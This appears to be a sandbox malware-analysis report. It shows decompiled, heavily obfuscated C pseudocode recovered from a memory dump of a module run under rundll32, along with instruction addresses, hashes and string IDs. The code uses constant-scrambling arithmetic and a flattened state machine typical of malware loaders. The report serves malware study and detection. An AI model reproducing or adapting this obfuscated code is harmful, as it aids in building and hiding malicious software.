				_v1608 = _v1608 >> 0xe;
				_v1608 = _v1608 ^ 0x000c01bf;
				_v1804 = 0xceac9b;
				_v1804 = _v1804 << 0x10;
				_t633 = 0x3d;
				_v1804 = _v1804 / _t633;
				_v1804 = _v1804 + 0x655b;
				_v1804 = _v1804 ^ 0x02dbc44e;
				_v1736 = 0x9be166;
				_v1736 = _v1736 >> 5;
				_v1736 = _v1736 ^ 0xd09875ee;
				_v1736 = _v1736 ^ 0xd0950b72;
				_v1824 = 0xc35391;
				_v1824 = _v1824 >> 3;
				_v1824 = _v1824 >> 0x10;
				_v1824 = _v1824 * 3;
				_v1824 = _v1824 ^ 0x00036b47;
				_v1800 = 0x15c07f;
				_v1800 = _v1800 << 9;
				_v1800 = _v1800 >> 4;
				_v1800 = _v1800 | 0x1ec023ab;
				_v1800 = _v1800 ^ 0x1effac55;
				_v1668 = 0x9ff678;
				_v1668 = _v1668 >> 6;
				_v1668 = _v1668 ^ 0x00061642;
				_v1676 = 0x388031;
				_v1676 = _v1676 + 0xa9e3;
				_v1676 = _v1676 ^ 0x003372a3;
				_v1700 = 0x68320b;
				_v1700 = _v1700 >> 9;
				_v1700 = _v1700 * 0x58;
				_v1700 = _v1700 ^ 0x00127519;
				_v1728 = 0x8bcc69;
				_v1728 = _v1728 + 0xffffee5b;
				_v1728 = _v1728 >> 0xf;
				_v1728 = _v1728 ^ 0x000f8317;
				_v1620 = 0xdd5dd2;
				_v1620 = _v1620 + 0xffff3cca;
				_v1620 = _v1620 ^ 0x00d1dad8;
				_v1756 = 0x5b77fe;
				_v1756 = _v1756 >> 0x10;
				_v1756 = _v1756 + 0xcf07;
				_v1756 = _v1756 ^ 0x0002651f;
				_v1600 = 0xe5338f;
				_v1600 = _v1600 >> 2;
				_v1600 = _v1600 ^ 0x0038d695;
				_v1748 = 0x539c61;
				_v1748 = _v1748 >> 4;
				_v1748 = _v1748 ^ 0x7ee23abc;
				_v1748 = _v1748 ^ 0x7eed6078;
				_v1660 = 0x8a8a87;
				_v1660 = _v1660 + 0xb3eb;
				_v1660 = _v1660 ^ 0x0081b7ad;
				_v1716 = 0x7622c2;
				_v1716 = _v1716 ^ 0x68bb0f30;
				_v1716 = _v1716 ^ 0x34de6465;
				_v1716 = _v1716 ^ 0x5c136dbb;
				_v1684 = 0xf6dfed;
				_v1684 = _v1684 << 0xb;
				_v1684 = _v1684 | 0x3f4bdd8f;
				_v1684 = _v1684 ^ 0xbff0253f;
				_v1816 = 0xe04e35;
				_v1816 = _v1816 >> 2;
				_v1816 = _v1816 + 0x327b;
				_v1816 = _v1816 + 0x911b;
				_v1816 = _v1816 ^ 0x003e79db;
				_v1612 = 0xd6f31e;
				_v1612 = _v1612 | 0x3022205e;
				_v1612 = _v1612 ^ 0x30f4c89e;
				_v1784 = 0xaf77e7;
				_t634 = 0x4a;
				_v1784 = _v1784 / _t634;
				_v1784 = _v1784 | 0x421bf711;
				_t635 = 0x50;
				_v1784 = _v1784 * 0x54;
				_v1784 = _v1784 ^ 0xb12f1f5b;
				_v1652 = 0xf84d37;
				_v1652 = _v1652 * 0x24;
				_v1652 = _v1652 ^ 0x22e540eb;
				_v1792 = 0xffdc51;
				_v1792 = _v1792 << 0xa;
				_v1792 = _v1792 | 0xe1b7830e;
				_v1792 = _v1792 + 0xffff0b40;
				_v1792 = _v1792 ^ 0xfffcd716;
				_v1740 = 0x197a11;
				_v1740 = _v1740 << 5;
				_v1740 = _v1740 / _t635;
				_v1740 = _v1740 ^ 0x00038a69;
				_v1644 = 0x6b00f0;
				_v1644 = _v1644 << 0xa;
				_v1644 = _v1644 ^ 0xac018c07;
				_v1604 = 0x611781;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x8bc919f5;
				_v1808 = 0xd36465;
				_t636 = 6;
				_v1808 = _v1808 * 0x36;
				_v1808 = _v1808 / _t636;
				_v1808 = _v1808 << 1;
				_v1808 = _v1808 ^ 0x0edf69e5;
				_v1832 = 0x3f9dc0;
				_v1832 = _v1832 + 0xffff18c0;
				_v1832 = _v1832 ^ 0x4a717db2;
				_v1832 = _v1832 << 8;
				_v1832 = _v1832 ^ 0x4fcf9c5e;
				_v1732 = 0x9e099a;
				_v1732 = _v1732 ^ 0xff857814;
				_v1732 = _v1732 + 0xffffca1f;
				_v1732 = _v1732 ^ 0xff111531;
				_v1776 = 0x4db87;
				_v1776 = _v1776 + 0xffff62f5;
				_v1776 = _v1776 ^ 0x44009895;
				_v1776 = _v1776 << 2;
				_v1776 = _v1776 ^ 0x101849e4;
				_v1708 = 0xd244cf;
				_v1708 = _v1708 >> 9;
				_t637 = 0x3a;
				_v1708 = _v1708 * 0x11;
				_v1708 = _v1708 ^ 0x000db4cc;
				_v1636 = 0xf59e87;
				_v1636 = _v1636 + 0xffff8d09;
				_v1636 = _v1636 ^ 0x00f1a368;
				_v1724 = 0x2bdcc8;
				_v1724 = _v1724 * 0x51;
				_v1724 = _v1724 * 0x5d;
				_v1724 = _v1724 ^ 0x0aa2c27a;
				_v1828 = 0x689116;
				_v1828 = _v1828 + 0xfffffd09;
				_v1828 = _v1828 / _t637;
				_t638 = 0x67;
				_v1828 = _v1828 / _t638;
				_v1828 = _v1828 ^ 0x000cd418;
				_v1692 = 0xa047a9;
				_v1692 = _v1692 << 6;
				_v1692 = _v1692 >> 3;
				_v1692 = _v1692 ^ 0x0505fbf3;
				_v1616 = 0xb6eb58;
				_v1616 = _v1616 ^ 0x8fb73430;
				_v1616 = _v1616 ^ 0x8f037651;
				_v1752 = 0x713cbb;
				_t639 = 0x59;
				_v1752 = _v1752 / _t639;
				_v1752 = _v1752 | 0x24e66ff7;
				_v1752 = _v1752 ^ 0x24e68565;
				_v1760 = 0x2ce68a;
				_v1760 = _v1760 + 0xf472;
				_v1760 = _v1760 >> 6;
				_v1760 = _v1760 ^ 0x000e4d4e;
				_v1764 = 0xb3dbfb;
				_v1764 = _v1764 * 0x44;
				_v1764 = _v1764 ^ 0x846d2ad4;
				_v1764 = _v1764 ^ 0xaba28cf9;
				_v1632 = 0xed14fe;
				_v1632 = _v1632 + 0x899;
				_v1632 = _v1632 ^ 0x00e7b355;
				_v1640 = 0x173d8;
				_v1640 = _v1640 | 0x072f8d22;
				_v1640 = _v1640 ^ 0x0725dc6d;
				_v1704 = 0xb743b;
				_v1704 = _v1704 * 0x22;
				_v1704 = _v1704 ^ 0x7ac75999;
				_v1704 = _v1704 ^ 0x7b4b4761;
				_v1648 = 0x376518;
				_t640 = 0x2b;
				_v1648 = _v1648 / _t640;
				_v1648 = _v1648 ^ 0x0009ae4a;
				_v1656 = 0x799ab2;
				_v1656 = _v1656 >> 5;
				_v1656 = _v1656 ^ 0x00024b68;
				_v1688 = 0x532d8e;
				_v1688 = _v1688 + 0xeacd;
				_t641 = 0x1f;
				_v1688 = _v1688 / _t641;
				_v1688 = _v1688 ^ 0x000bfc86;
				_v1696 = 0x1a47c3;
				_t642 = 0x35;
				_v1696 = _v1696 * 0x3c;
				_v1696 = _v1696 * 0x79;
				_v1696 = _v1696 ^ 0xe948599c;
				_v1788 = 0x31ddc5;
				_v1788 = _v1788 / _t642;
				_v1788 = _v1788 | 0x1a71d74c;
				_v1788 = _v1788 ^ 0xb8e3b14c;
				_v1788 = _v1788 ^ 0xa29596cb;
				_v1796 = 0xb7daa1;
				_v1796 = _v1796 + 0xffff2907;
				_v1796 = _v1796 >> 1;
				_t643 = 0x19;
				_v1796 = _v1796 * 0x38;
				_v1796 = _v1796 ^ 0x140afc74;
				_v1680 = 0x68ee60;
				_t407 =  &_v1680; // 0x68ee60
				_v1680 =  *_t407 / _t643;
				_t413 =  &_v1680; // 0x68ee60
				_t644 = 0x4b;
				_v1680 =  *_t413 / _t644;
				_v1680 = _v1680 ^ 0x000d0b0c;
				_v1624 = 0x50062a;
				_v1624 = _v1624 + 0xffffe4c0;
				_v1624 = _v1624 ^ 0x004144d3;
				_v1772 = 0x8d0174;
				_v1772 = _v1772 | 0x883a70ab;
				_t645 = 0x7c;
				_v1772 = _v1772 / _t645;
				_v1772 = _v1772 + 0x6c34;
				_v1772 = _v1772 ^ 0x01154615;
				_v1780 = 0x3c67da;
				_v1780 = _v1780 ^ 0x3b09705b;
				_t646 = 0x39;
				_v1780 = _v1780 / _t646;
				_v1780 = _v1780 | 0x19d7c010;
				_v1780 = _v1780 ^ 0x19d74af7;
				_v1664 = 0x6ef7ab;
				_v1664 = _v1664 >> 0x10;
				_v1664 = _v1664 ^ 0x00064358;
				_v1712 = 0x6e7286;
				_v1712 = _v1712 << 3;
				_v1712 = _v1712 + 0xffff7147;
				_v1712 = _v1712 ^ 0x03763b5e;
				_v1720 = 0x51f33b;
				_v1720 = _v1720 * 0x24;
				_v1720 = _v1720 | 0x382a3589;
				_v1720 = _v1720 ^ 0x3ba3189b;
				_v1672 = 0xa7c9a6;
				_v1672 = _v1672 | 0x6235af6b;
				_v1672 = _v1672 ^ 0x62b8a2b2;
				_t706 = _v1596;
				while(1) {
					L1:
					_t602 = 0x4d28763;
					while(1) {
						L2:
						_t647 = 0x87702da;
						L3:
						while(_t708 != 0x23fa72) {
							if(_t708 == 0x2649e52) {
								_push(_v1656);
								_push(_v1648);
								_push(_v1704);
								_push( &_v1564);
								_push( &_v1592);
								_push(_v1640);
								_push(_t647);
								_push(0);
								_t605 = E002B9700(0, _v1632, __eflags);
								_t714 = _t713 + 0x20;
								__eflags = _t605;
								if(_t605 == 0) {
									L27:
									return _t605;
								}
								E002C4DAD(_v1688, _v1696, _v1592, _v1788, _v1796);
								_t713 = _t714 + 0xc;
								_push(_v1780);
								_push(_v1772);
								_t696 = _v1624;
								_push(_v1588);
								_t650 = _v1680;
								L26:
								return E002C4DAD(_t650, _t696);
							}
							if(_t708 == 0x3216d22) {
								_push(_v1672);
								_push(_v1720);
								_t696 = _v1712;
								_push(_v1596);
								_t650 = _v1664;
								goto L26;
							}
							if(_t708 == 0x6088cb4) {
								__eflags = _t706 - _t602;
								if(__eflags != 0) {
									_t708 = 0xd3ee486;
									continue;
								}
								_push(_t647);
								_t605 = E002BB41A(_v1608, _v1768,  &_v1596, _v1804, _v1736);
								_t713 = _t713 + 0x14;
								__eflags = _t605;
								if(__eflags == 0) {
									goto L27;
								}
								_t708 = 0xd3ee486;
								while(1) {
									L1:
									_t602 = 0x4d28763;
									L2:
									_t647 = 0x87702da;
									goto L3;
								}
							}
							if(_t708 == 0x7bff6cd) {
								_t612 = E002BB186();
								__eflags = _t612 - E002B9685(_t647);
								_t602 = 0x4d28763;
								_t708 = 0x6088cb4;
								_t706 =  !=  ? 0x4d28763 : 0x58d295;
								goto L2;
							}
							if(_t708 == _t647) {
								_push(_v1596);
								_t615 = E002C363D( &_v1564, _v1832, _v1732, _v1776, _v1708,  &_v1592, _t647);
								_t713 = _t713 + 0x1c;
								__eflags = _t615;
								if(__eflags != 0) {
									E002C4DAD(_v1636, _v1724, _v1592, _v1828, _v1692);
									E002C4DAD(_v1616, _v1752, _v1588, _v1760, _v1764);
									_t713 = _t713 + 0x18;
								}
								L11:
								_t708 = 0x3216d22;
								goto L1;
							}
							_t727 = _t708 - 0xd3ee486;
							if(_t708 != 0xd3ee486) {
								L21:
								__eflags = _t708 - 0x61b4f51;
								if(__eflags != 0) {
									continue;
								}
								return _t602;
							}
							E002D12A8(_t647, _v1824, _t727, _v1800, _v1668,  &_v1044);
							 *((short*)(E002C4FA8(_v1676,  &_v1044, _v1700, _v1728))) = 0;
							E002B8650(_v1620,  &_v524, _t727, _v1756);
							_push(_v1716);
							_push(_v1660);
							_push(0x2b183c);
							E002BE7CE(E002BAB66(_v1600, _v1748, _t727), _t727, _v1684,  &_v1044, _v1600, _v1816, _v1612, _v1784, _v1652,  &_v524);
							E002BAE03(_v1792, _v1740, _v1644, _t622);
							_t627 = E002CC38F(_v1604,  &_v1564, _t629, _v1808);
							_t713 = _t713 + 0x54;
							if(_t627 != 0) {
								_t602 = 0x4d28763;
								__eflags = _t706 - 0x4d28763;
								_t647 = 0x87702da;
								_t708 =  ==  ? 0x87702da : 0x2649e52;
								continue;
							}
							goto L11;
						}
						_t708 = 0x7bff6cd;
						goto L21;
					}
				}
			}




































































































                                                                                                                      0x002b2fa7
                                                                                                                      0x002b2fb1
                                                                                                                      0x002b2fb9
                                                                                                                      0x002b2fc4
                                                                                                                      0x002b2fcf
                                                                                                                      0x002b2fd7
                                                                                                                      0x002b2fdf
                                                                                                                      0x002b2fe4
                                                                                                                      0x002b2fec
                                                                                                                      0x002b2ff4
                                                                                                                      0x002b2ffe
                                                                                                                      0x002b3000
                                                                                                                      0x002b3005
                                                                                                                      0x002b300a
                                                                                                                      0x002b3015
                                                                                                                      0x002b3018
                                                                                                                      0x002b301c
                                                                                                                      0x002b3024
                                                                                                                      0x002b302c
                                                                                                                      0x002b3034
                                                                                                                      0x002b3041
                                                                                                                      0x002b3045
                                                                                                                      0x002b304d
                                                                                                                      0x002b3058
                                                                                                                      0x002b3063
                                                                                                                      0x002b306e
                                                                                                                      0x002b3076
                                                                                                                      0x002b3086
                                                                                                                      0x002b308a
                                                                                                                      0x002b3092
                                                                                                                      0x002b309a
                                                                                                                      0x002b30a5
                                                                                                                      0x002b30ad
                                                                                                                      0x002b30b8
                                                                                                                      0x002b30c0
                                                                                                                      0x002b30c9
                                                                                                                      0x002b30cc
                                                                                                                      0x002b30d0
                                                                                                                      0x002b30d8
                                                                                                                      0x002b30e0
                                                                                                                      0x002b30e8
                                                                                                                      0x002b30ed
                                                                                                                      0x002b30f5
                                                                                                                      0x002b30fd
                                                                                                                      0x002b3105
                                                                                                                      0x002b310a
                                                                                                                      0x002b3114
                                                                                                                      0x002b3118
                                                                                                                      0x002b3120
                                                                                                                      0x002b3128
                                                                                                                      0x002b312d
                                                                                                                      0x002b3132
                                                                                                                      0x002b313a
                                                                                                                      0x002b3142
                                                                                                                      0x002b314d
                                                                                                                      0x002b3155
                                                                                                                      0x002b3160
                                                                                                                      0x002b316b
                                                                                                                      0x002b3176
                                                                                                                      0x002b3181
                                                                                                                      0x002b318c
                                                                                                                      0x002b319c
                                                                                                                      0x002b31a3
                                                                                                                      0x002b31b0
                                                                                                                      0x002b31b8
                                                                                                                      0x002b31c0
                                                                                                                      0x002b31c5
                                                                                                                      0x002b31cd
                                                                                                                      0x002b31d8
                                                                                                                      0x002b31e3
                                                                                                                      0x002b31ee
                                                                                                                      0x002b31f6
                                                                                                                      0x002b31fb
                                                                                                                      0x002b3203
                                                                                                                      0x002b320b
                                                                                                                      0x002b3216
                                                                                                                      0x002b321e
                                                                                                                      0x002b3229
                                                                                                                      0x002b3231
                                                                                                                      0x002b3236
                                                                                                                      0x002b323e
                                                                                                                      0x002b3246
                                                                                                                      0x002b3251
                                                                                                                      0x002b325c
                                                                                                                      0x002b3267
                                                                                                                      0x002b3272
                                                                                                                      0x002b327d
                                                                                                                      0x002b3288
                                                                                                                      0x002b3293
                                                                                                                      0x002b329e
                                                                                                                      0x002b32a6
                                                                                                                      0x002b32b1
                                                                                                                      0x002b32bc
                                                                                                                      0x002b32c4
                                                                                                                      0x002b32c9
                                                                                                                      0x002b32d1
                                                                                                                      0x002b32d9
                                                                                                                      0x002b32e1
                                                                                                                      0x002b32ec
                                                                                                                      0x002b32f7
                                                                                                                      0x002b3302
                                                                                                                      0x002b3310
                                                                                                                      0x002b3315
                                                                                                                      0x002b331b
                                                                                                                      0x002b3328
                                                                                                                      0x002b332b
                                                                                                                      0x002b332f
                                                                                                                      0x002b3337
                                                                                                                      0x002b334a
                                                                                                                      0x002b3351
                                                                                                                      0x002b335c
                                                                                                                      0x002b3364
                                                                                                                      0x002b3369
                                                                                                                      0x002b3371
                                                                                                                      0x002b3379
                                                                                                                      0x002b3381
                                                                                                                      0x002b3389
                                                                                                                      0x002b3396
                                                                                                                      0x002b339a
                                                                                                                      0x002b33a2
                                                                                                                      0x002b33ad
                                                                                                                      0x002b33b5
                                                                                                                      0x002b33c0
                                                                                                                      0x002b33cb
                                                                                                                      0x002b33d3
                                                                                                                      0x002b33de
                                                                                                                      0x002b33eb
                                                                                                                      0x002b33ec
                                                                                                                      0x002b33f6
                                                                                                                      0x002b33fc
                                                                                                                      0x002b3400
                                                                                                                      0x002b3408
                                                                                                                      0x002b3410
                                                                                                                      0x002b3418
                                                                                                                      0x002b3420
                                                                                                                      0x002b3425
                                                                                                                      0x002b342d
                                                                                                                      0x002b3435
                                                                                                                      0x002b343d
                                                                                                                      0x002b3445
                                                                                                                      0x002b344d
                                                                                                                      0x002b3455
                                                                                                                      0x002b345d
                                                                                                                      0x002b3465
                                                                                                                      0x002b346a
                                                                                                                      0x002b3472
                                                                                                                      0x002b347d
                                                                                                                      0x002b348f
                                                                                                                      0x002b3492
                                                                                                                      0x002b3499
                                                                                                                      0x002b34a4
                                                                                                                      0x002b34af
                                                                                                                      0x002b34ba
                                                                                                                      0x002b34c5
                                                                                                                      0x002b34d8
                                                                                                                      0x002b34e7
                                                                                                                      0x002b34ee
                                                                                                                      0x002b34f9
                                                                                                                      0x002b3501
                                                                                                                      0x002b3511
                                                                                                                      0x002b3519
                                                                                                                      0x002b351e
                                                                                                                      0x002b3524
                                                                                                                      0x002b352c
                                                                                                                      0x002b3537
                                                                                                                      0x002b353f
                                                                                                                      0x002b3547
                                                                                                                      0x002b3552
                                                                                                                      0x002b355d
                                                                                                                      0x002b3568
                                                                                                                      0x002b3573
                                                                                                                      0x002b357f
                                                                                                                      0x002b3582
                                                                                                                      0x002b3586
                                                                                                                      0x002b358e
                                                                                                                      0x002b3596
                                                                                                                      0x002b359e
                                                                                                                      0x002b35a6
                                                                                                                      0x002b35ab
                                                                                                                      0x002b35b3
                                                                                                                      0x002b35c0
                                                                                                                      0x002b35c4
                                                                                                                      0x002b35cc
                                                                                                                      0x002b35d4
                                                                                                                      0x002b35df
                                                                                                                      0x002b35ea
                                                                                                                      0x002b35f5
                                                                                                                      0x002b3600
                                                                                                                      0x002b360b
                                                                                                                      0x002b3616
                                                                                                                      0x002b3629
                                                                                                                      0x002b3630
                                                                                                                      0x002b363b
                                                                                                                      0x002b3648
                                                                                                                      0x002b365c
                                                                                                                      0x002b3661
                                                                                                                      0x002b366a
                                                                                                                      0x002b3675
                                                                                                                      0x002b3680
                                                                                                                      0x002b3688
                                                                                                                      0x002b3693
                                                                                                                      0x002b369e
                                                                                                                      0x002b36b0
                                                                                                                      0x002b36b5
                                                                                                                      0x002b36be
                                                                                                                      0x002b36c9
                                                                                                                      0x002b36dc
                                                                                                                      0x002b36df
                                                                                                                      0x002b36ee
                                                                                                                      0x002b36f5
                                                                                                                      0x002b3700
                                                                                                                      0x002b3710
                                                                                                                      0x002b3714
                                                                                                                      0x002b371c
                                                                                                                      0x002b3724
                                                                                                                      0x002b372c
                                                                                                                      0x002b3734
                                                                                                                      0x002b373c
                                                                                                                      0x002b3745
                                                                                                                      0x002b3748
                                                                                                                      0x002b374c
                                                                                                                      0x002b3754
                                                                                                                      0x002b375f
                                                                                                                      0x002b376a
                                                                                                                      0x002b3771
                                                                                                                      0x002b3778
                                                                                                                      0x002b377d
                                                                                                                      0x002b3786
                                                                                                                      0x002b3791
                                                                                                                      0x002b379c
                                                                                                                      0x002b37a7
                                                                                                                      0x002b37b2
                                                                                                                      0x002b37ba
                                                                                                                      0x002b37c6
                                                                                                                      0x002b37cb
                                                                                                                      0x002b37d1
                                                                                                                      0x002b37d9
                                                                                                                      0x002b37e1
                                                                                                                      0x002b37e9
                                                                                                                      0x002b37f5
                                                                                                                      0x002b37f8
                                                                                                                      0x002b37fc
                                                                                                                      0x002b3804
                                                                                                                      0x002b380c
                                                                                                                      0x002b3817
                                                                                                                      0x002b3824
                                                                                                                      0x002b382f
                                                                                                                      0x002b383a
                                                                                                                      0x002b3842
                                                                                                                      0x002b384d
                                                                                                                      0x002b3858
                                                                                                                      0x002b386b
                                                                                                                      0x002b3872
                                                                                                                      0x002b387d
                                                                                                                      0x002b3888
                                                                                                                      0x002b3893
                                                                                                                      0x002b389e
                                                                                                                      0x002b38a9
                                                                                                                      0x002b38b0
                                                                                                                      0x002b38b0
                                                                                                                      0x002b38b0
                                                                                                                      0x002b38b5
                                                                                                                      0x002b38b5
                                                                                                                      0x002b38b5
                                                                                                                      0x00000000
                                                                                                                      0x002b38ba
                                                                                                                      0x002b38cc
                                                                                                                      0x002b3b5f
                                                                                                                      0x002b3b6d
                                                                                                                      0x002b3b74
                                                                                                                      0x002b3b7b
                                                                                                                      0x002b3b83
                                                                                                                      0x002b3b84
                                                                                                                      0x002b3b92
                                                                                                                      0x002b3b93
                                                                                                                      0x002b3b97
                                                                                                                      0x002b3b9c
                                                                                                                      0x002b3b9f
                                                                                                                      0x002b3ba1
                                                                                                                      0x002b3bf7
                                                                                                                      0x002b3bf7
                                                                                                                      0x002b3bf7
                                                                                                                      0x002b3bc0
                                                                                                                      0x002b3bc5
                                                                                                                      0x002b3bc8
                                                                                                                      0x002b3bcc
                                                                                                                      0x002b3bd0
                                                                                                                      0x002b3bd7
                                                                                                                      0x002b3bde
                                                                                                                      0x002b3be5
                                                                                                                      0x00000000
                                                                                                                      0x002b3bea
                                                                                                                      0x002b38d4
                                                                                                                      0x002b3b37
                                                                                                                      0x002b3b3e
                                                                                                                      0x002b3b45
                                                                                                                      0x002b3b4c
                                                                                                                      0x002b3b53
                                                                                                                      0x00000000
                                                                                                                      0x002b3b53
                                                                                                                      0x002b38e0
                                                                                                                      0x002b3add
                                                                                                                      0x002b3adf
                                                                                                                      0x002b3b17
                                                                                                                      0x00000000
                                                                                                                      0x002b3b17
                                                                                                                      0x002b3ae1
                                                                                                                      0x002b3afd
                                                                                                                      0x002b3b02
                                                                                                                      0x002b3b05
                                                                                                                      0x002b3b07
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b3b0d
                                                                                                                      0x002b38b0
                                                                                                                      0x002b38b0
                                                                                                                      0x002b38b0
                                                                                                                      0x002b38b5
                                                                                                                      0x002b38b5
                                                                                                                      0x00000000
                                                                                                                      0x002b38b5
                                                                                                                      0x002b38b0
                                                                                                                      0x002b38ec
                                                                                                                      0x002b3ab8
                                                                                                                      0x002b3ac4
                                                                                                                      0x002b3acb
                                                                                                                      0x002b3ad0
                                                                                                                      0x002b3ad5
                                                                                                                      0x00000000
                                                                                                                      0x002b3ad5
                                                                                                                      0x002b38f4
                                                                                                                      0x002b3a1d
                                                                                                                      0x002b3a4a
                                                                                                                      0x002b3a4f
                                                                                                                      0x002b3a52
                                                                                                                      0x002b3a54
                                                                                                                      0x002b3a76
                                                                                                                      0x002b3a98
                                                                                                                      0x002b3a9d
                                                                                                                      0x002b3a9d
                                                                                                                      0x002b39fd
                                                                                                                      0x002b39fd
                                                                                                                      0x00000000
                                                                                                                      0x002b39fd
                                                                                                                      0x002b38fa
                                                                                                                      0x002b3900
                                                                                                                      0x002b3b26
                                                                                                                      0x002b3b26
                                                                                                                      0x002b3b2c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b3b2c
                                                                                                                      0x002b391d
                                                                                                                      0x002b3950
                                                                                                                      0x002b395a
                                                                                                                      0x002b3962
                                                                                                                      0x002b3969
                                                                                                                      0x002b397b
                                                                                                                      0x002b39c1
                                                                                                                      0x002b39d9
                                                                                                                      0x002b39f1
                                                                                                                      0x002b39f6
                                                                                                                      0x002b39fb
                                                                                                                      0x002b3a04
                                                                                                                      0x002b3a0e
                                                                                                                      0x002b3a10
                                                                                                                      0x002b3a15
                                                                                                                      0x00000000
                                                                                                                      0x002b3a15
                                                                                                                      0x00000000
                                                                                                                      0x002b39fb
                                                                                                                      0x002b3b21
                                                                                                                      0x00000000
                                                                                                                      0x002b3b21
                                                                                                                      0x002b38b5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Fs$+M$4l$5N$AX$[e$[p;$^ "0$`h$aGK{$x`~${2$@"
                                                                                                                      • API String ID: 0-3551049037
                                                                                                                      • Opcode ID: 90bed2ab7ed8dada0fa576201145a6644c2ba760062c926880024c3187e4f76c
                                                                                                                      • Instruction ID: 4b4b5dedab70b5c1e5b8d324bca7b0a4e18d0ab26770ed371add33eff082cd84
                                                                                                                      • Opcode Fuzzy Hash: 90bed2ab7ed8dada0fa576201145a6644c2ba760062c926880024c3187e4f76c
                                                                                                                      • Instruction Fuzzy Hash: CA520F715093819FE379CF21C54AB9BBBE2BBC4708F10891DE2DA96260D7B18959CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CD8D7 Relevance: 15.5, Strings: 12, Instructions: 455COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E002CD8D7() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				unsigned int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* _t526;
				signed int _t531;
				void* _t540;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t550;
				intOrPtr _t551;
				signed int _t552;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				void* _t568;
				void* _t625;
				signed int _t627;
				signed int* _t631;

				_t631 =  &_v1760;
				_v1616 = 0xeae527;
				_v1568 = 0;
				_t553 = 0x26;
				_v1616 = _v1616 / _t553;
				_v1616 = _v1616 ^ 0x00062e5a;
				_t625 = 0x971d92c;
				_v1596 = 0x6602e1;
				_t554 = 0x25;
				_v1596 = _v1596 / _t554;
				_v1596 = _v1596 ^ 0x8002c1cf;
				_v1644 = 0xf63434;
				_t555 = 0x47;
				_v1644 = _v1644 / _t555;
				_v1644 = _v1644 + 0xf19c;
				_v1644 = _v1644 ^ 0x00046956;
				_v1716 = 0x50524a;
				_t32 =  &_v1716; // 0x50524a
				_t556 = 0x5f;
				_v1716 =  *_t32 / _t556;
				_v1716 = _v1716 + 0xeb9a;
				_v1716 = _v1716 >> 0x10;
				_v1696 = 0xd12665;
				_v1696 = _v1696 + 0xba99;
				_v1696 = _v1696 >> 2;
				_v1696 = _v1696 ^ 0x003ae3d7;
				_v1572 = 0xb7077f;
				_v1572 = _v1572 >> 0xb;
				_v1572 = _v1572 ^ 0x00005559;
				_v1732 = 0xacadbb;
				_v1732 = _v1732 * 0x18;
				_v1732 = _v1732 + 0xffff3f00;
				_v1732 = _v1732 >> 0xb;
				_v1732 = _v1732 ^ 0x0000fc07;
				_v1628 = 0x1e838c;
				_v1628 = _v1628 + 0xffff51c5;
				_v1628 = _v1628 * 0x68;
				_v1628 = _v1628 ^ 0x0c18a6b3;
				_v1712 = 0x7a729f;
				_v1712 = _v1712 | 0x553aa77e;
				_v1712 = _v1712 ^ 0x421b02cb;
				_v1712 = _v1712 * 0x57;
				_v1712 = _v1712 ^ 0xf24da14c;
				_v1620 = 0x85e70f;
				_v1620 = _v1620 >> 0xb;
				_v1620 = _v1620 ^ 0x000e59ba;
				_v1752 = 0xad6578;
				_v1752 = _v1752 * 0x5a;
				_v1752 = _v1752 << 0xc;
				_v1752 = _v1752 << 0x10;
				_v1752 = _v1752 ^ 0x00023595;
				_v1728 = 0x3989b2;
				_v1728 = _v1728 * 0x27;
				_v1728 = _v1728 * 0x4d;
				_v1728 = _v1728 << 4;
				_v1728 = _v1728 ^ 0x2f238c3a;
				_v1744 = 0x50e625;
				_v1744 = _v1744 ^ 0x2e9ac150;
				_v1744 = _v1744 >> 2;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 ^ 0x00596b64;
				_v1684 = 0x3fc833;
				_t557 = 0x76;
				_v1684 = _v1684 / _t557;
				_v1684 = _v1684 ^ 0xe050a76e;
				_v1684 = _v1684 ^ 0xe05ba95d;
				_v1576 = 0x904481;
				_v1576 = _v1576 | 0xbb34e4d7;
				_v1576 = _v1576 ^ 0xbbb7ee3e;
				_v1612 = 0xe49eb3;
				_v1612 = _v1612 + 0xfa7c;
				_v1612 = _v1612 ^ 0x00e777f0;
